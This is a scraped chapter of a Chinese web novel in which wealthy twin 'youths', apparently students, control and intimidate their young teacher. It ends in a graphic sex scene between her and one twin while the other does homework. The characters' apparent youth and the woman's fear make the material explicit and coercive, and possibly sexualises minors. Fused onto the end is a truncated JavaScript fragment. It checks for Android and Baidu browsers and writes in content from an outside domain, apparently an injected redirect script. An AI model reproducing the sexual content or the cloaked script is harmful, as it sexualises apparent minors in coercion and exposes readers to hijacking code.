逃脱 分卷阅读60

    兰荻的黑眸瞪向她,“还不去葎那里,没听到她在叫你过去吗”

    蓝静仪如遇大赦地跑向红色跑车。

    纳兰葎打开门把她抱上来,手臂依旧揽着她,另一只手却娴熟地打火开车。

    蓝静仪有点别扭地扭着身子,手臂紧紧一勒,她整个人落进他的怀抱。

    “宝贝,今天表现的很好哦”

    蓝静仪不明所以地看着他俊美的侧脸,纳兰葎低头对她一笑,“没想到我们宝贝这么厉害,凶的时候有点像只小母豹,幸亏做错事的不是我和荻”他向她挤挤眼,狭长的眼眸美的像两块透明的水晶。

    他笑的好像天使,蓝静仪暗叹。

    他是为她训斥蓝蕼而高兴吗,可是这和他有什么关系呢?

    “不要想别人”纳兰葎霸道地搂紧她,低头吻了下她的头顶,“我想要你了”他离开她耳边时轻声宣布。

    蓝静仪脸红了,直红到耳根儿。

    36

    教室里的同学三三两两的都走光了,连楼道里也变得空旷。只有唯美如漫画里走出的少年仍靠在冰冷的墙壁上,俊美如大理石雕的面庞毫无表情。

    他紧紧闭着眼睛,即使这样他的脸也美得极致,他的整个身子陷在楼道的阴影里,孤傲清高。

    肖英眼睛里全是心痛,她宁愿站在那里的是自己。蓝蕼,那个淡漠如沙漠,孤高若胡杨的少年现在竟然被罚站,这对于他来说简直就是一种亵渎。

    她轻轻走近,仰望着他,“蓝蕼,走吧,老师已经走了”

    少年仍靠在冰冷的墙上,头微仰,紧紧闭着眼,落叶黄的发线碎碎地遮住他的眼睑,他似乎已经这样死去。

    肖英心里一阵悸动,“你站在这里老师也不会知道的,走吧,回家吧”她去拉他的手,她有些害怕他那种空寂的表情,仿佛他的灵魂已飞离那完美的躯壳。

    “走开”少年冷冷地开口,却没有张开眼。

    “不要折磨自己了,我知道你根本就没错……”她用尽了力气也根本无法拉动他。

    “请你走开”少年张开眼,眸光冷淡地看着她。

    肖英怔住了,那双眼如此好看!可是却比冰还要冷淡,在他的目光下,她的手悄悄松开,她不敢再说话,默默而委屈地退到角落里。

    楼道的光线渐渐暗淡,慢慢陷入黑暗中,夜色在整个空寂的走廊里迷漫。被黑暗包围的少年仍旧紧紧地靠在墙上,姿势一直都没有变。

    一直在角落里站着的少女也维持着同样的姿势,只是一双眼睛仍在痴痴地望向少年,仿佛永远也不会厌倦。

    “混蛋”纳兰获将手中的信纸掷在阿奔脸上。

    阿奔抓在手里,吓出一身冷汗。虽然那是老爷让他转交给少爷的,他只是充当信使,可是两位少爷的脾性他一清二楚,他很怕少爷会迁怒于他。

    “你不是号称做事从不失手吗,阿奔?”纳兰葎轻声问,那阴柔的声音像蘸着毒汁的软鞭,却比利剑还要杀人无形。

    “是……我无能……”阿奔垂头,双膝打战。

    纳兰葎轻哼,“通常老头那里的规矩是什么?”

    “少爷饶命”阿奔体如筛糠。

    “听说没完成任务的人都会自我处决,切掉自己一根手指,阿奔,你觉得自己哪根手指比较多余?”

    “少爷……”阿奔跪了下去。

    一直没说话的纳兰获皱眉,“快滚,别让我再看到你”

    “谢谢少爷”阿奔爬起来,跌撞着跑出去。

    纳兰荻面容阴冷地转身向里走。

    “老头真狠,竟然用经济手段威胁我们”纳兰葎跟过去。

    纳兰荻低着头,不答话,只是唇角抿成一线,黑眸冷窒,紧紧地咬牙。

    蓝静仪从冰箱里取出面包,一转身,面包啪地掉在地上。

    龙涎香迷漫,高大的身影向她压近,“葎,我们宝贝很不会过日子,这么好的面包随地乱扔”说话时他偏头看着她的眼睛。

    蓝静仪连忙变腰拾起来,眼睛躲闪着。他刚进来时他脸上的表情冷的可怕。

    “哥,不是老师不会过日子,是被你吓的啦”纳兰葎却已经一副没事的样子,还乐得很欢。

    “你怕我?”纳兰获拧眉看她。

    “没……没有”她明显在撒谎,但如果说有的话,她不敢预测那么说的后果。

    “听到了吧”纳兰荻把话抛给身后的纳兰葎。

    “鬼才信”纳兰葎轻嗤。

    纳兰荻不理他,看看她手中的面包,“做得什么嗯?”声音变得柔和了些。

    “面…包片,黄油,另外还有烤肠……鸡片……”

    “这就是你做的晚餐?哥,老师还真是很会过日子”

    “挑剔”纳兰荻轻哼,“这不是很好吗,值得鼓励,快点把面包片切好,我饿了”说完,他转身走向餐桌。

    “跩什么跩”纳兰葎小声嘀咕,“来,我帮你”他冲着蓝静仪灿烂地笑着。

    有那么一瞬间,蓝静仪有点晃神,这时的他完完全全就是个阳光美少年,似乎关于他所有的邪恶都出自她的恶梦,都是她的不实的臆想。

    豪华宽阔的卧室里灯光如昼。

    女子的呻吟声和肉体拍打声却充斥了整个房间。

    地板上,身材纤巧的女子浑身赤裸,她仰躺在地板上,两条大腿被强行打开,膝盖曲起,不停地摇晃着,高大的黑发少年伏在她身上,上身衣着完好,下身却未着一物,他体形完美修长,臀部赤裸的肌肤有着少年特有的弹性光泽,他结实的屁股不断地挺进,粗大的阳物在女子的身体里驰骋。

    “啊~~嗯~~~啊~~~~”随着少年越来越有力的撞击,女子嘴里发出不堪的呻吟,奶白的小脸紧紧地皱起,挺翘的乳房如同翻滚的雪浪,剧烈地摇摆着。

    黑发少年的一张脸比阿波罗还要俊美,他刚毅的唇角紧抿,即使沉在情色中也仍是满脸冰酷,深邃的黑眸停在女子紧皱而汗湿的小脸儿上,下身的动作却更加冷酷刚猛。

    粗长如硬棍的巨龙深深地插入女子狭窒的体内,完全拔出来,又快速地顶进去。

    “啊~~~~~~~啊~~~~~~~啊~~~~~~~~~”女子的头轻甩,双腿随着少年的节奏急剧地摇动,脚尖因为疼痛与快感紧紧地绷起。

    房间里不远处的书桌旁,坐着一个金发少年,他的脸竟然和黑发少年生得一模一样,同样的俊美无俦,却有着不一样的风流姿态。

    他的面前摊开着书本,手里握着笔,低头写着试卷。他的侧颜完美如天使。在同一间房间里,和他像貌一样的黑发少年正在一个娇弱女子身上狂烈地索取,整个房间里充满淫靡旖旎的气息,而他却在写作业,女子的呻吟和肉体的拍打甚至每一次巨物在女子身体里进出的声音都清晰地传入他的耳朵,而这种淫靡之音却

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('